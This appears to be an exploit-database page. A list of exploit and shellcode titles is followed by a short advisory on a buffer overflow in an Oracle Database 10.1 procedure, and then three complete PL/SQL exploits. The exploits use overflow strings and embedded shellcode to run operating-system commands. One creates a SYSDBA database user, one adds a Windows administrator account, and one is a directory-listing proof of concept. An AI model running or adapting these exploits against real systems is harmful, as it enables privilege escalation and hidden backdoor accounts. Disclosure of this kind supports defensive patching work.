
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
155 lines
No EOL
5.2 KiB
Text
155 lines
No EOL
5.2 KiB
Text
source: https://www.securityfocus.com/bid/13145/info
|
|
|
|
Oracle Database is reported prone to a buffer overflow vulnerability.
|
|
|
|
Reportedly this issue affects the 'MDSYS.MD2.SDO_CODE_SIZE' procedure. An attacker can supply excessive data to an affected routine resulting in overflowing a destination buffer. This issue can be leveraged to execute arbitrary code and gain 'SYSDBA' privileges.
|
|
|
|
It is conjectured that authentication is required to carry out an attack.
|
|
|
|
This BID will be updated when more information is available.
|
|
|
|
/*
|
|
Advanced SQL Injection in Oracle databases
|
|
|
|
Exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDO_CODE_SIZE
|
|
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
|
|
Fixes available at http://metalink.oracle.com.
|
|
|
|
The exploit creates a SYSDBA user ERIC with a password 'MYPSW12'
|
|
|
|
By Esteban Martinez Fayo
|
|
secemf@gmail.com
|
|
*/
|
|
|
|
DECLARE
|
|
a BINARY_INTEGER; -- return value
|
|
AAA VARCHAR2(32767);
|
|
BEGIN
|
|
AAA := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEE
|
|
EEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG
|
|
GGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|
|
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
|
|
/*
|
|
83C3 09 ADD EBX,9
|
|
FFE3 JMP EBX
|
|
*/
|
|
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
|
|
/*
|
|
userenv.dll
|
|
78E35AFB 4B DEC EBX
|
|
78E35AFC FFD3 CALL EBX
|
|
*/
|
|
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) ||
|
|
chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) ||
|
|
chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
|
|
/*
|
|
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
|
|
50 PUSH EAX
|
|
B8 BF8E0178 MOV EAX,MSVCRT.system
|
|
FFD0 CALL EAX
|
|
B8 93830078 MOV EAX,MSVCRT._endthread
|
|
FFD0 CALL EAX
|
|
*/
|
|
|| 'echo CREATE USER ERIC IDENTIFIED BY MYPSW12; > c:\cu.sql'||chr(38)||'
|
|
echo GRANT DBA TO ERIC; >> c:\cu.sql '||chr(38)||' echo ALTER USER ERIC DEFAULT ROLE DBA;
|
|
>> c:\cu.sql '||chr(38)||' echo GRANT SYSDBA TO "ERIC" WITH ADMIN OPTION; >>
|
|
c:\cu.sql'||chr(38)||'echo QUIT >> c:\cu.sql '||chr(38)||'
|
|
c:\oracle\product\10.1.0\db_1\bin\sqlplus.exe "/ as sysdba" @c:\cu.sql 1>
|
|
c:\stdout.log 2> c:\stderr.log';
|
|
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
|
|
END;
|
|
|
|
--------------------------------------------------------------------------------------------------------
|
|
|
|
/*
|
|
Advanced SQL Injection in Oracle databases
|
|
|
|
Exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDO_CODE_SIZE
|
|
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
|
|
Fixes available at http://metalink.oracle.com.
|
|
|
|
The exploit creates a Windows user ERIC with Administrator privilege.
|
|
|
|
By Esteban Martinez Fayo
|
|
secemf@gmail.com
|
|
*/
|
|
|
|
DECLARE
|
|
a BINARY_INTEGER; -- return value
|
|
AAA VARCHAR2(32767);
|
|
BEGIN
|
|
AAA := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEE
|
|
EEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGG
|
|
GGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|
|
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
|
|
/*
|
|
83C3 09 ADD EBX,9
|
|
FFE3 JMP EBX
|
|
*/
|
|
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
|
|
/*
|
|
userenv.dll
|
|
78E35AFB 4B DEC EBX
|
|
78E35AFC FFD3 CALL EBX
|
|
*/
|
|
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191)
|
|
|| chr(142) || chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147)
|
|
|| chr(131) || chr(00) || chr(120) || chr(255) || chr(208)
|
|
/*
|
|
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
|
|
50 PUSH EAX
|
|
B8 BF8E0178 MOV EAX,MSVCRT.system
|
|
FFD0 CALL EAX
|
|
B8 93830078 MOV EAX,MSVCRT._endthread
|
|
FFD0 CALL EAX
|
|
*/
|
|
|| 'net user admin2 /add '||chr(38)||' net localgroup Administradores
|
|
admin2 /add '||chr(38)||' net localgroup ORA_DBA admin2 /add';
|
|
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
|
|
end;
|
|
|
|
--------------------------------------------------------------------------------------------------------
|
|
|
|
/*
|
|
Advanced SQL Injection in Oracle databases
|
|
|
|
Proof of concept exploit for the buffer overflow vulnerability in procedure MDSYS.MD2.SDO_CODE_SIZE
|
|
of Oracle Database Server version 10.1.0.2 under Windows 2000 Server SP4.
|
|
Fixes available at http://metalink.oracle.com.
|
|
|
|
By Esteban Martinez Fayo
|
|
secemf@gmail.com
|
|
*/
|
|
|
|
DECLARE
|
|
a BINARY_INTEGER; -- return value
|
|
AAA VARCHAR2(32767);
|
|
BEGIN
|
|
AAA := 'AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEE
|
|
EEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGG
|
|
GGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'
|
|
|| CHR(131) || CHR(195) || CHR(9) || CHR(255) || CHR(227)
|
|
/*
|
|
83C3 09 ADD EBX,9
|
|
FFE3 JMP EBX
|
|
*/
|
|
|| CHR(251) || CHR(90) || CHR (227) || CHR(120) -- Jump to address 0x78E35AFB
|
|
/*
|
|
userenv.dll
|
|
78E35AFB 4B DEC EBX
|
|
78E35AFC FFD3 CALL EBX
|
|
*/
|
|
|| CHR(54) || CHR(141) || CHR(67) || CHR(19) || CHR(80) || chr(184) || chr(191) || chr(142)
|
|
|| chr(01) || chr(120) || chr(255) || chr(208) || chr(184) || chr(147) || chr(131) ||
|
|
chr(00) || chr(120) || chr(255) || chr(208)
|
|
/*
|
|
36:8D43 13 LEA EAX,DWORD PTR SS:[EBX+13]
|
|
50 PUSH EAX
|
|
B8 BF8E0178 MOV EAX,MSVCRT.system
|
|
FFD0 CALL EAX
|
|
B8 93830078 MOV EAX,MSVCRT._endthread
|
|
FFD0 CALL EAX
|
|
*/
|
|
|| 'dir>c:\dir.txt'; -- OS command to execute
|
|
a := MDSYS.MD2.SDO_CODE_SIZE (LAYER => AAA);
|
|
END; |